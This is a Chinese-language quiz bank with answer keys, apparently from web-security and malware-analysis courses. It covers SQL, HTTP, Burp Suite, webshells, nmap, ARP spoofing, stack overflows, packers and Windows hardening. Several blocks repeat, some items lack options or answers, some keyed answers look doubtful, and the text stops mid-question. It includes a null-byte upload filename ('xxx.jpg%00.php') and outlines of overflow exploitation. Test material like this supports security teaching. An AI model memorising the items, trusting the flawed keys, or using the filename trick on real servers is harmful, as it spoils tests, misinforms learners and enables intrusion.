35、编写Python程序请求网页的时候设置timeout主要是为了防止程序奔溃这个说法正确吗
A、 对
B、 错
标准答案: B
36、代理ip因为经常失效,所以需要维护一个代理ip池定期检查是否失效,这个说法是否正确?
A、 对
B、 错
标准答案: A
37、以下哪项是爬取代理ip中不需要的数据
A、 ip
B、 端口
C、 内存地址
D、 连接类型
标准答案: C
38、Python requests可以用来验证代理吗
A、 对
B、 错
标准答案: A
39、Zoomeye的api 当请求错误时会返回一个json格式的错误响应,下面哪个不是错误响应中json的字段?
A、 error
B、 message
C、 url
D、 userkey
标准答案: D
40、视频代码中使用json.load()的作用在于将字符串类型转化为 Python的字典类型这个说法正确吗?
A、 对
B、 错
标准答案: A
41、数据库管理系统DBMS的全称是什么?
A、 Database Management Software
B、 Database Management System
C、 Director Base Medical Services
D、 Data Being Manipulated Sequentially
标准答案: B
42、数据库(Database)是按照数据结构来组织、存储和管理数据的仓库,这句话对吗?
A、 对
B、 错
标准答案: A
43、关系数据库,是建立在关系模型基础上的数据库,借助于集合代数等数学概念和方法来处理数据库中的数据。这句话对吗?
A、 对
B、 错
标准答案: A
44、在下列关于关系型数据库系统的叙述中,正确的是
A、 表的字段之间和记录之间都不存在联系
B、 表的字段之间不存在联系,而记录之间存在联系
C、 表的字段之间和记录之间都存在联系
D、 表中只有字段之间存在联系
标准答案: C
45、revoke select on admin to bai这个SQL语句是干嘛的?
A、 数据查询DDL
B、 授权DCL
C、 删除记录DML
D、 回滚TCL
标准答案: B
46、SQL的全称是什么?
A、 Structured Question Language
B、 Strong Question Language
C、 Specified Quality Level
D、 Structured Query Language
标准答案: D
47、哪个 SQL 语句用于从数据库中提取数据?
A、 EXTRACT
B、 SELECT
C、 OPEN
D、 GET
标准答案: B
48、DDL(Data Definition Language)数据库操纵语言,用于定义数据库的三级结构,包括外模式、概念模式、内模式及其相互之间的映像,定义数据的完整性、安全控制等约束?
A、 对
B、 错
标准答案: B
49、哪条 SQL 语句用于更新数据库中的数据?
A、 UPDATE
B、 MODIFY
C、 SAVE
D、 SAVE AS
标准答案: A
50、哪条 SQL 语句用于删除数据库中的数据?
A、 COLLAPSE
B、 REMOVE
C、 DELETE
D、 del
标准答案: C
1、MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。这句话对吗?
A、 对
B、 错
标准答案: A
2、网站数据库经常会遭受哪种类型的攻击?
A、 跨站脚本
B、 跨站请求伪造
C、 SQL注入
D、 不安全的直接对象引用
标准答案: C
3、通过 SQL,您如何从 “ichunqiu” 表中选取 “username” 列的值以 “a” 开头的所有记录?
A、 SELECT * FROM ichunqiu WHERE username LIKE ‘a%’
B、 SELECT * FROM ichunqiu WHERE username=‘a’
C、 SELECT * FROM ichunqiu WHERE username LIKE ‘%a’
D、 SELECT * FROM ichunqiu WHERE username=’%a%’
标准答案: A
4、哪个 SQL 关键词用于对结果集进行排序?
A、 ORDER
B、 ORDER BY
C、 SORT
D、 SORT BY
标准答案: B
5、关于HTML5说法正确的是?
A、 HTML5只是对HTML4的一个简单升级
B、 所有主流浏览器都支持HTML5
C、 HTML5新增了离线缓存机制
D、 HTML5主要是针对移动端进行了优化
标准答案: C
6、下列哪一项是CSS正确的语法构成?
A、 body:color=black
B、 {body;color:black}
C、 body {color: black;}
D、 {body:color=black(body}
标准答案: C
7、我们可以在下列哪个 HTML 元素中放置 Javascript 代码?
A、
B、
C、
D、
标准答案: B
8、JavaScript是弱类型语言,不需要用户对变量类型进行明确的定义,这句话对吗?
A、 对
B、 错
标准答案: A
9、定义 JavaScript 数组的正确方法是
A、 var txt = new Array(“George”,“John”,“Thomas”)
B、 var txt = new Array=“George”,“John”,“Thomas”
C、 var txt = new Array:1=(“George”)2=(“John”)3=(“Thomas”)
D、 var txt = new Array(1:“George”,2:“John”,3:“Thomas”)
标准答案: A
10、ActionScript中所有数据都是对象这句话对吗?
A、 对
B、 错
标准答案: A
11、以下函数中,取得给定日期的月份的是什么
A、 day()
B、 month()
C、 year()
D、 weekday()
标准答案: B
12、下面哪种语言不被浏览器执行
A、 ASP
B、 HTML
C、 VBScript
D、 Javascript
标准答案: A
13、ASP.NET中,对于已经生成好的Web Service,在部署和实现该XML Web Service的时候,至少需要的文件有
A、 .asmx文件和.dll文件
B、 .dll文件和.disco文件
C、 AssemblyInfo.cs文件和Web.config文件
D、 AssemblyInfo.cs文件和.asmx文件
标准答案: A
14、ASP.NET中启动页级别的跟踪,可以在@Page指令中设置()参数来实现。
A、 race和TraceRange
B、 Trace和TraceMode
C、 Try和Catch
D、 Try和Finally
标准答案: B
15、ASP.NET程序中,以下()最有利于黑客在Web服务器上对站点文件进行破坏。
A、 Applicaion对象的Lock方法
B、 Server对象的MapPath方法
C、 客户端的JavaScript脚本
D、 页面内的_ViewState控件
标准答案: C
16、下面不属于PHP的标签是
A、 < >
B、 ?>
C、 = ?>
D、
标准答案: A
17、以下关于PHP的描述不正确的是
A、 PHP是一种弱类型、解释型语言
B、 PHP与C、JAVA等面向对象一样,需要明确指定变量类型
C、 PHP可以与MySQL进行交互,创建动态Web站点
D、 PHP是PHP:Hypertext Preprocessor的递归缩写
标准答案: B
18、下面哪个是JSP中最基本的对象,它是用户与服务器进行交互的基础。
A、 Response对象
B、 Application对象
C、 Request对象
D、 Session对象
标准答案: C
19、在JSP程序中只有3种编译指令,分别是加载指令、标记数据库指令和什么指令
A、 描述指令
B、 网页指令
C、 取代指令
D、 释放指令
标准答案: B
20、Page指令中的“contenType”属性是用于指出什么类型
A、 服务器类型
B、 用户类型
C、 数据库类型
D、 网页类型
标准答案: D
21、在请求头中Connection表示什么
A、 表示客户端与服务连接类型
B、 表示浏览器有能力解码的编码类型
C、 表示浏览器支持的 MIME 类型
D、 表示客户端与服务连接类型
标准答案: D
22、burpsuite不可以抓到HTTPS的内容这句话对吗
A、 对
B、 错
标准答案: B
23、使用burpsuite爆破时在哪里设置Payload type为Numbers?
A、 Repeater下的payloads
B、 Intruder下的Payloads
C、 Proxy下的payloads
D、 Intruder下Target
标准答案: B
24、Webshell的功能不能实现读取注册表,这句话对吗?
A、 对
B、 错
标准答案: B
25、这句webshell通过下面什么方式来执行的呢?
A、 参数HTTP_USER_AGENT
B、 HTTP请求头HTTP_USER_AGENT
C、 参数$_SERVER[‘HTTP_USER_AGENT’]
D、 参数system
标准答案: B
26、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?
A、 不相等
B、 相等
C、 不能用全等于来判断
D、 以上说法都不正确
标准答案: A
27、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?
A、 xxx.asp;.jpg
B、 /xxx.asp/xxx.jpg
C、 /xxx.cer
D、 xxx.jpg%00.php
标准答案: D
28、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?
A、 对
B、 错
标准答案: B
29、在iconv转码的过程中,utf转为gb2312会出现什么问题?
A、 字符串变成ASCII码了
B、 字符串为空了
C、 字符串变乱码了
D、 字符串被截断
标准答案: D
30、AngularJS是什么?
A、 Web应用
B、 Web前端框架
C、 Web服务端语言
D、 数据库
标准答案: B
31、Node.js能通过JavaScript语言开发web服务端吗?
A、 对
B、 错
标准答案: A
32、刷新和转到谁会更新本地的缓存?
A、 刷新
B、 转到
C、 刷新和转到都会更新
D、 刷新和转到都不会更新
标准答案: A
33、WWW的全称是什么?
A、 Wiki Wiki Web
B、 World Wide Web
C、 World Weather Watch
D、 Whole Wide World
标准答案: B
34、Bootstrap是哪个公司推出的前端开发开源工具包?
A、 Google
B、 Facebook
C、 Twitter
D、 Microsoft
标准答案: C
35、CMS是Content Management System的缩写?
A、 对
B、 错
标准答案: A
36、Django是什么语言编写的Web框架?
A、 PHP
B、 JavaScript
C、 Python
D、 Java
标准答案: C
37、下面关于ASP的表述中正确的是?
A、 ASP只能用写字板打开编辑
B、 ASP是一套客户端脚本运行环境
C、 ASP程序可以包含纯文字、HTML标记以及脚本语言
D、 ASP是一种跨平台的服务器的嵌入式脚本语言
标准答案: C
38、IIS的全称是什么?
A、 Internet Information System
B、 Industry Information Security
C、 Immunization Information Systems
D、 Internet Information Services
标准答案: D
39、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?
A、 同一应用中的多个程序共享一个数据集合
B、 多个用户共享一个数据文件
C、 多个用户、同一种语言共享数据
D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合
标准答案: D
40、Cookie在本地会有存储,这句话对吗?
A、 对
B、 错
标准答案: A
41、Windows是美国哪个公司研发的一套操作系统?
A、 Yahoo!
B、 Google
C、 iTunes
D、 Microsoft
标准答案: D
42、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?
A、 对
B、 错
标准答案: B
43、HTTP协议对事物处理有记忆能力,这句话对吗?
A、 对
B、 错
标准答案: B
44、TCP/IP是哪个层的协议
A、 表示层
B、 会话层
C、 应用层
D、 传输层
标准答案: C
45、以下哪些层是属于TCP/IP参考模型
A、 应用层
B、 传输层
C、 互联网层
D、 网络访问层
标准答案:
46、服务器错误服务不可用返回的数字是什么
A、 200
B、 403
C、 503
D、 502
标准答案: C
47、下面那个是不属于HTTP报头
A、 普通报头
B、 正文报头
C、 请求报头
D、 响应报头
标准答案: B
48、返回的状态码是200代表着什么
A、 客户端请求有语法错误,不能被服务器所理解
B、 服务器收到请求,但是拒绝提供服务。
C、 服务器发生不可预期的错误。
D、 客户端请求成功
标准答案: D
49、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。
A、 对
B、 错
标准答案: A
50、SQLI-LABS是一个什么漏洞练习平台
A、 SQL Injection
B、 XSS
C、 CSRF
D、 命令执行
标准答案: A
1、burpsuite不可以抓到HTTPS的内容这句话对吗
A、 对
B、 错
标准答案: B
2、使用burpsuite爆破时在哪里设置Payload type为Numbers?
A、 Repeater下的payloads
B、 Intruder下的Payloads
C、 Proxy下的payloads
D、 Intruder下Target
标准答案: B
3、Webshell的功能不能实现读取注册表,这句话对吗?
A、 对
B、 错
标准答案: B
4、这句webshell通过下面什么方式来执行的呢?
A、 参数HTTP_USER_AGENT
B、 HTTP请求头HTTP_USER_AGENT
C、 参数$_SERVER[‘HTTP_USER_AGENT’]
D、 参数system
标准答案: B
5、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?
A、 不相等
B、 相等
C、 不能用全等于来判断
D、 以上说法都不正确
标准答案: A
6、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?
A、 xxx.asp;.jpg
B、 /xxx.asp/xxx.jpg
C、 /xxx.cer
D、 xxx.jpg%00.php
标准答案: D
7、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?
A、 对
B、 错
标准答案: B
8、在iconv转码的过程中,utf转为gb2312会出现什么问题?
A、 字符串变成ASCII码了
B、 字符串为空了
C、 字符串变乱码了
D、 字符串被截断
标准答案: D
9、AngularJS是什么?
A、 Web应用
B、 Web前端框架
C、 Web服务端语言
D、 数据库
标准答案: B
10、Node.js能通过JavaScript语言开发web服务端吗?
A、 对
B、 错
标准答案: A
11、刷新和转到谁会更新本地的缓存?
A、 刷新
B、 转到
C、 刷新和转到都会更新
D、 刷新和转到都不会更新
标准答案: A
12、WWW的全称是什么?
A、 Wiki Wiki Web
B、 World Wide Web
C、 World Weather Watch
D、 Whole Wide World
标准答案: B
13、Bootstrap是哪个公司推出的前端开发开源工具包?
A、 Google
B、 Facebook
C、 Twitter
D、 Microsoft
标准答案: C
14、CMS是Content Management System的缩写?
A、 对
B、 错
标准答案: A
15、Django是什么语言编写的Web框架?
A、 PHP
B、 JavaScript
C、 Python
D、 Java
标准答案: C
16、下面关于ASP的表述中正确的是?
A、 ASP只能用写字板打开编辑
B、 ASP是一套客户端脚本运行环境
C、 ASP程序可以包含纯文字、HTML标记以及脚本语言
D、 ASP是一种跨平台的服务器的嵌入式脚本语言
标准答案: C
17、IIS的全称是什么?
A、 Internet Information System
B、 Industry Information Security
C、 Immunization Information Systems
D、 Internet Information Services
标准答案: D
18、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?
A、 同一应用中的多个程序共享一个数据集合
B、 多个用户共享一个数据文件
C、 多个用户、同一种语言共享数据
D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合
标准答案: D
19、Cookie在本地会有存储,这句话对吗?
A、 对
B、 错
标准答案: A
20、Windows是美国哪个公司研发的一套操作系统?
A、 Yahoo!
B、 Google
C、 iTunes
D、 Microsoft
标准答案: D
21、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?
A、 对
B、 错
标准答案: B
22、HTTP协议对事物处理有记忆能力,这句话对吗?
A、 对
B、 错
标准答案: B
23、TCP/IP是哪个层的协议
A、 表示层
B、 会话层
C、 应用层
D、 传输层
标准答案: C
24、以下哪些层是属于TCP/IP参考模型
A、 应用层
B、 传输层
C、 互联网层
D、 网络访问层
标准答案:
25、服务器错误服务不可用返回的数字是什么
A、 200
B、 403
C、 503
D、 502
标准答案: C
26、下面那个是不属于HTTP报头
A、 普通报头
B、 正文报头
C、 请求报头
D、 响应报头
标准答案: B
27、返回的状态码是200代表着什么
A、 客户端请求有语法错误,不能被服务器所理解
B、 服务器收到请求,但是拒绝提供服务。
C、 服务器发生不可预期的错误。
D、 客户端请求成功
标准答案: D
28、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。
A、 对
B、 错
标准答案: A
29、SQLI-LABS是一个什么漏洞练习平台
A、 SQL Injection
B、 XSS
C、 CSRF
D、 命令执行
标准答案: A
30、Linux中提供了很多的网卡配置工具,下面哪个不属于Linux中配置网络的命令?
A、 netconfig
B、 prtconf
C、 ifconfig
D、 linuxconfig
标准答案: B
31、下面哪个参数可以让nmap不检测主机存活
A、 -sL
B、 -sn
C、 -Pn
D、 -PS
标准答案: C
32、在Metasploit中,我们使用什么命令加载第三方模块,如Nmap
A、 exploit_nmap
B、 show_nmap
C、 db_nmap
D、 run_nmap
标准答案: C
33、parallels desktop是哪个平台下的虚拟机软件
A、 Windows
B、 Android
C、 Mac OS
D、 Linux
标准答案: C
34、Kali Linux 前身是什么?
A、 NodeZero
B、 BackTrack
C、 Matriux
D、 Anonymous-OS
标准答案: B
35、在使用Python的Socket模块编程的时候,使用下面哪个方法来绑定本地地址
A、 accept
B、 send
C、 bind
D、 listen
标准答案: C
36、在使用Python的Socket模块编程的时候,使用下面哪个方法来发送消息
A、 accept
B、 send
C、 recv
D、 listen
标准答案: B
37、视频中实现的程序无法切换目录,在Python的OS模块中什么函数可以改变当前路径到指定路径
A、 os.remove()
B、 os.chdir()
C、 os.listdir()
D、 os.mkdir()
标准答案: B
38、Python中可以使用什么库来实现多线程
A、 OS
B、 Threading
C、 Time
D、 Socket
标准答案: B
39、在Python中,我们实例化一个Thread对象后,通过什么方法来运行
A、 start()
B、 enumerate()
C、 Thread()
D、 setDaemon()
标准答案: A
40、Python中我们使用try-except语句是为了保证用户是按软件使用要求传入三个参数,这句话对吗
A、 对
B、 错
标准答案: A
41、Python中SocketServer库中handle()函数有什么用?
A、 准备请求处理. 默认什么都不做
B、 处理请求,解析传入的请求,处理数据,并发送响应。默认什么都不做
C、 环境清理。默认什么都不做
D、 通过服务器的构造函数来激活服务器。默认的行为只是监听服务器套接字。可重载。
标准答案: B
42、以下有关代理服务器说法中不正确的是()
A、 为工作站提供访问Internet的代理服务
B、 代理服务器可用作防火墙
C、 使用代理服务器可提高Internet的浏览速度
D、 代理服务器是一种硬件技术,是建立在浏览器与Web服务器之间的服务器
标准答案: D
43、IMAP协议的端口号是多少
A、 80
B、 21
C、 143
D、 25
标准答案: C
44、使用Python编写抓包工具时,利用Python模块scapy中什么方法开始抓包?
A、 arp
B、 ether
C、 sniff
D、 sendp
标准答案: C
45、以下关于ARP欺骗的描述错误的是
A、 ARP欺骗可冒充网关欺骗主机
B、 ARP欺骗可冒充主机欺骗网关
C、 ARP欺骗可冒充主机欺骗其它主机
D、 在主机上静态绑定网关的MAC地址可防止所有ARP欺骗
标准答案: D
46、关于ARP表,以下描述中正确的是
A、 用于建立IP地址到MAC地址的映射
B、 提供常用目标地址的快捷方式来减少网络流量
C、 用于进行应用层信息的转换
D、 用于在各个子网之间进行路由选择
标准答案: A
47、下列关于ARP协议正确的是
A、 全称地址解析协议,通过ARP可以将IP地址解析为MAC地址。
B、 可以实现MAC地址到IP地址的转换。
C、 ARP病毒主要是利用IP地址可以随意更改来实现的。
D、 以上都正确
标准答案: A
48、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()
A、 对
B、 错
标准答案: A
49、在wireshark所抓数据包分析里,SYN响应包是ACK
A、 对
B、 错
标准答案: B
50、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗
A、 对
B、 错
标准答案: A
1、下列对于ESP与EBP寄存器的描述错误的是?
A、 EBP在栈空的时候指向的是栈底,ESP指向的是栈底的下一个位置
B、 当参数入栈时,ESP指向的栈地址会向上移动
C、 当有参数入栈时,EBP指向的栈地址会向下移动
D、 EBP标识了当前栈帧的底部,ESP标识了当前栈帧的顶部
标准答案: C
2、下列对于栈溢出漏洞原理的描述错误的是哪条?
A、 可以造成命令执行漏洞
B、 栈溢出漏洞是缓冲区溢出漏洞的一种
C、 由于软件开发人员没有考虑周全造成的漏洞
D、 操作系统的内存管理机制的漏洞
标准答案: D
3、下列对软件壳保护技术描述错误的是?
A、 利用特殊的算法,对EXE、DLL文件里的资源进行压缩、加密
B、 附加在源程序之上,被加载执行的
C、 一般情况下,壳程序在源程序执行之前执行
D、 程序加壳保护,就不会存在源码泄露的风险
标准答案: D
4、下列对虚拟机保护壳描述错误的是?
A、 需要将代码翻译为机器和人都无法识别的一串伪代码字节流
B、 虚拟机就是将无法识别的伪代码字节流翻译为原始代码的一段程序
C、 就是程序在执行时创建一个虚拟机来执行程序,与主机隔离,防止源码外泄
D、 程序在执行时,先执行虚拟机程序将无法识别的伪代码逐步翻译
标准答案: C
5、下列关于缓冲区溢出的描述错误的是?
A、 计算机向缓冲区内填充数据位数超过了缓冲区本身的容量
B、 利用缓冲区溢出攻击,可以导致程序运行失败、系统关机、重启等
C、 缓冲区溢出是操作系统的内存管理机制的缺陷
D、 缓冲区溢出中,最为危险的是堆栈溢出
标准答案: C
6、在创建新的栈帧时EBP与ESP分别执行____操作。
A、 add esp,n;pop ebp;ret;
B、 push ebp;move ebp,esp;sub esp,n;
C、 move ebp;push ebp;pop;
D、 push esp;move esp;ret;
标准答案: B
7、下列关于栈描述错误的是?
A、 用于线性存储数据的内存
B、 具有先进后出的特点
C、 只能在一端对数据进行插入和删除
D、 使用的是二级缓存
标准答案: D
8、常见病毒程序中Overlay的起点位于区段表中哪个位置?
A、 倒数第二个区块末尾
B、 第一个区块开头
C、 最后一个区块末尾
D、 第一个区块末尾
标准答案: C
9、下列哪种方式不是病毒一般进行静态分析所采用的方式?
A、 查找字符串
B、 侦壳操作
C、 行为监控
D、 PE分析
标准答案: C
10、下面关于UPX的描述错误的是____。
A、 是一款可执行文件压缩器
B、 upx -9 表示最强程度压缩命令
C、 upx压缩后的文件需要解压后才能执行
D、 upx -d 为解压命令
标准答案: C
11、下面关于VMProtect的描述错误的是____。
A、 VMProtect是一个解释执行引擎
B、 在function层面X86代码和VMProtect不是一一对应的
C、 其本质是一个堆栈机
D、 通过NOR和ADD来实现X86指令的等价运算
标准答案: B
12、下面关于UPX的描述错误的是____。
A、 是一款可执行文件压缩器
B、 upx -9 表示最强程度压缩命令
C、 upx压缩后的文件需要解压后才能执行
D、 upx -d 为解压命令
标准答案: C
13、下面关于VMProtect的描述错误的是____。
A、 VMProtect是一个解释执行引擎
B、 在function层面X86代码和VMProtect不是一一对应的
C、 其本质是一个堆栈机
D、 通过NOR和ADD来实现X86指令的等价运算
标准答案: B
14、下列不属于脚本病毒的特点是:
A、 隐蔽性强
B、 传播性强
C、 爆发性
D、 自我消失性
标准答案: D
15、下列软件中不属于木马文件的是:
A、 PCshare
B、 njRAT
C、 KilerRat
D、 PCHunter
标准答案: D
16、直接通过文件后缀名判断该文件是否具有危害性:
A、 对
B、 错
标准答案: B
17、能够隐藏任务栏图标的软件是:
A、 HideTools
B、 PCHunter
C、 火绒剑
D、 冰刃
标准答案: A
18、下列哪个键值是修改文件关联方式的关键值:
A、 HKEY_CLASS_ROOT\txtfile\shell\open\command
B、 HKEY_CURRENT_USER\txtfile\shell\open\command
C、 HKEY_CLASS_ROOT\txtfile\shell\class\command
D、 HKEY_CURRENT_USER\txtfile\shell\class\command
标准答案: A
19、下列不属于本地安全策略中密码策略的是:
A、 密码必须符合复杂性要求
B、 密码长度最小值
C、 密码最长使用期限
D、 密码长度最大值
标准答案: D
20、开启密码必须符合复杂性要求策略后,下列哪个命令能够成功执行:
A、 net user test 123123 /add
B、 net user test 12312a /add
C、 net user test 123ads /add
D、 net user test 123!adss!! /add
标准答案: D
21、用户登录失败的记录可以通过事件管理器来查看
A、 对
B、 错
标准答案: A
22、用户不可以利用本地安全策略来实现:
A、 编辑计算机上的帐号策略和本地策略
B、 控制访问计算机的用户
C、 启用或禁用开始菜单内的功能选项
D、 修改计算机用户名密码
标准答案: D
23、配置组策略的主要目的是提高计算机安全性
A、 对
B、 错
标准答案: A
24、当计算器网络环境处在域环境中,应当配置哪个防火墙配置文件:
A、 专用配置文件
B、 域配置文件
C、 共用配置文件
D、 局域网配置文件
标准答案: B
25、如何配置远程桌面禁止访问:
A、 在入站规则处将远程桌面已启用选项关闭
B、 在出站规则处将远程桌面已启用选项打开
C、 在入站规则处将远程桌面已启用选项打开
D、 在出站规则处将远程桌面已启用选项关闭
标准答案: A
26、只允许本机访问其他机器的80端口,下面配置正确的是:
A、 在入站规则处新建规则,指定特定端口为80,协议为tcp的流量通行
B、 在出站规则处新建规则,指定特定端口为135,协议为tcp的流量通行
C、 在入站规则处新建规则,指定特定端口为135,协议为tcp的流量通行
D、 在出站规则处新建规则,指定特定端口为80,协议为tcp的流量通行
标准答案: D
27、禁用Windows firewall服务后,windows防火墙能够正常使用
A、 对
B、 错
标准答案: B
28、IPSec通过什么安全性来提供主动的保护以防止专用网络与Internet的攻击
A、 点对点
B、 端对端
C、 点对端
D、 端对点
标准答案: B
29、对于隧道模式说法正确的是:
A、 只对ip有效数据载荷进行封装和加密
B、 安全程度较低
C、 IP源和目标ip地址不加密传送
D、 从外部看不到数据包的路由过程
标准答案: D
30、下列选项中,不属于IPSec的优点是:
A、 除TCP/IP协议之外,不支持其他协议
B、 保护ip数据包的内容
C、 为IPV4和IPV6提供互操作能力
D、 保护ip数据包的内容
标准答案: A
31、新建一个IPSec策略,将源地址为任意地址的icmp协议包禁用,其他人使用ping命令探测本机,无法ping通
A、 对
B、 错
标准答案: A
32、下列属于系统克隆工具的是:
A、 TrueCrypt
B、 javaexec
C、 wce
D、 Ghost
标准答案: D
33、使用Ghost备份系统的步骤,Local->Partition->ToImage.开始备份系统
A、 对
B、 错
标准答案: A
34、对于栈是什么,下面说法正确的是():
A、 用于线性存储数据的内存,数据可以是函数的全局变量
B、 用于线性存储数据的内存,数据可以是函数的全局变量
C、 具有先出后进的特点
D、 与栈有关的操作:push入栈,pop出栈,mov数据传递指令
标准答案: D
35、函数栈帧之间对比错误的是():
A、 ESP内存空间为当前函数的栈帧
B、 EBP标识了当前栈帧的底部
C、 ESP标识了当前栈帧的底部,EBP标识了后面栈帧的顶部
D、 ESP与EBP之间的内存空间为当前函数的栈帧
标准答案: C
36、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()
A、 对
B、 错
标准答案: B
37、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()
A、 对
B、 错
标准答案: B
38、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()
A、 对
B、 错
标准答案: B
39、Flash的JIT并没有检查CFG合法性?()
A、 对
B、 错
标准答案: A
40、漏洞分析有三大分类,正确一项是():
A、 利用位置,威胁类型,技术类型
B、 本地类型
C、 获取服务类型
D、 内存破坏类:动态数据区溢出
标准答案: A
41、构造数据通过程序不断的转播处理,改变了程序执行流程,造成数据被当作代码执行。()
A、 对
B、 错
标准答案: A
42、下面代码不存在溢出漏洞():
A、 对
B、 错
标准答案: B
43、当打开一个漏洞样本的时候,这个样本执行了test.tmp的exe,这个test.tmp还把IE执行起来了。在整个过程当中,那个API函数不可以运行可执行文件():
A、 ShellExecute
B、 Dumpbin
C、 CreateProcess
D、 WinExec
标准答案: B
44、一个PE文件装载进内存里,用OD调式器解释,可以看到有EIP指针,ESP当前函数栈帧,EBP函数栈帧,数据区(全局变量)。()
A、 对
B、 错
标准答案: A
45、堆栈溢出指的是堆溢出。()
A、 对
B、 错
标准答案: B
46、OLE对象包含内容的是():
A、 TXT纯文字文档
B、 PDF、Office、Flash格式文档
C、 EXE格式文档
D、 RAR格式文档
标准答案: B
47、OLE创建包含不同来源的复合文档和应用程序,不同类型的数据,但不能把文字、声音、表格、应用程序组合。()
A、 对
B、 错
标准答案: B
48、栈溢出后,如何利用漏洞?():
A、 少字节可编辑,EBP覆盖,文件格式系统嵌入,Shellcode后台执行,正常保存打开
B、 少字节可编辑,正常保存打开
C、 EBP覆盖,正常保存打开
D、 文件格式系统嵌入,正常保存打开
标准答案: A
49、如何做到栈溢出漏洞利用的技巧?():
A、 样本打开、触发漏洞、返回用户空间、显示正常页面
B、 样本打开、触发漏洞、搜索执行、恢复堆栈、返回用户空间、显示正常页面
C、 搜索执行、返回用户空间、显示正常页面
D、 触发漏洞、显示正常页面
标准答案: B
50、在Windows内置用户中,拥有最高权限的用户什么?( )
A、 Guest
B、 Adminitrator
C、 System
D、 User
标准答案: C
1、在Windows中将用户超级隐藏后,用户仍会在哪里有显示?( )
A、 命令提示符
B、 注册表
C、 用户组
D、 进程
标准答案: D
2、下列哪项不是Windows的常用文件系统?( )
A、 FAT32
B、 FILE
C、 NTFS
D、 EXT
标准答案: B
3、在NTFS文件系统中,子文件系统继承父文件系统权限后,如何修改子文件的权限?( )
A、 在子文件中修改
B、 在父文件中修改
C、 AB都可以
D、 上述都不对
标准答案: B
4、如果Windows中某文件采用EFS加密技术,未授权的其他管理员用户可以对文件进行什么操作?( )
A、 访问
B、 删除
C、 修改
D、 上述都不可以
标准答案: B
5、如何在未授权的情况下访问EFS加密的文件?( )
A、 输入管理员密码
B、 修改用户注册表
C、 导入证书
D、 修改为相同的用户名和密码
标准答案: C
6、在Windows中,为本地磁盘进行配额目的是什么?()
A、 平均分割磁盘
B、 避免部分用户占用磁盘过大
C、 清理垃圾文件
D、 提高磁盘利用率
标准答案: B
7、Windows中,在文件属性“共享”中,无法与之共享的用户是()
A、 Adminstrator
B、 Internet来宾用户
C、 Users
D、 Everyone
标准答案: C
8、Windows中,文件共享后,使用户对该文件权限和NTFS所设权限一样,方法有()
A、 开启共享向导
B、 启用脱机文件
C、 添加网上邻居向导
D、 更改共享对象
标准答案: A
9、Windows中,Service文件存储在什么地方()
A、 System32/config/service
B、 System32/config/system
C、 System/config/system
D、 System/config/service
标准答案: B
10、一个服务的启动类型为system,其在注册表中修改start的值是多少?( )
B、 1
C、 2
D、 3
标准答案: B
11、如何在DOS环境下查看系统当中的进程?
A、 tasklist
B、 taskkill
C、 del
D、 kill
标准答案: A
12、DOS下显示隐藏磁盘目录的命令是什么?
A、 attrib -s
B、 dir /ah
C、 type
D、 tree
标准答案: B
13、对病毒进行行为分析最常用的工具为?
A、 IDA Pro
B、 Process Monitor
C、 OllyDBG
D、 Process Explorer
标准答案: B
14、DOS下net share admin$ /del /y命令的作用是什么?
A、 添加系统根目录的共享
B、 查看共享
C、 取消系统根目录共享
D、 设置共享资源的用户
标准答案: C
15、Windows系统中的文件名查找函数是哪个?
A、 Process32First
B、 Module32First
C、 FindFirstFile
D、 Thread32First
标准答案: C
16、Windows系统终止指定进程及其所有线程的函数是什么?
A、 Process32First
B、 Module32First
C、 TerminateProcess
D、 Thread32First
标准答案: C
17、Windows系统字符连接函数是哪个?
A、 Process32First
B、 Module32First
C、 FindFirstFile
D、 lstrcat
标准答案: D
18、以下哪款工具可以实现查壳的工作?
A、 IDA Pro
B、 PEiD
C、 WinDbg
D、 Process Monitor
标准答案: B
19、在OD工具中,单步步过,单步步入的快捷键分别是什么?
A、 F8 F9
B、 F8 F7
C、 F7 F8
D、 F9 F7
标准答案: B
20、程序的返回值一般保存在以下哪个寄存器中?
A、 eax
B、 ebx
C、 ecx
D、 edx
标准答案: A
21、以下哪项不属于病毒的静态分析?
A、 采用反病毒引擎扫描
B、 计算哈希值
C、 查找字符串
D、 使用沙箱
标准答案: D
22、以下哪项不属于病毒的动态分析?
A、 使用沙箱
B、 行为监控
C、 PE分析
D、 WinDbg调试
标准答案: C
23、Windows获取进程信息建立进程快照的函数是?
A、 Module32First
B、 CreateToolhelp32Snapshot
C、 Process32First
D、 Heap32ListFirst
标准答案: B
24、Exeinfo PE工具的主要作用是什么?
A、 代码审计
B、 程序逆向
C、 查询文件是否加壳
标准答案: C
25、OllyDbg软件主要用于静态分析程序
A、 对
B、 错
标准答案: B
26、下列哪个工具可以查看软件内核模块?
A、 CDD Explorer.exe
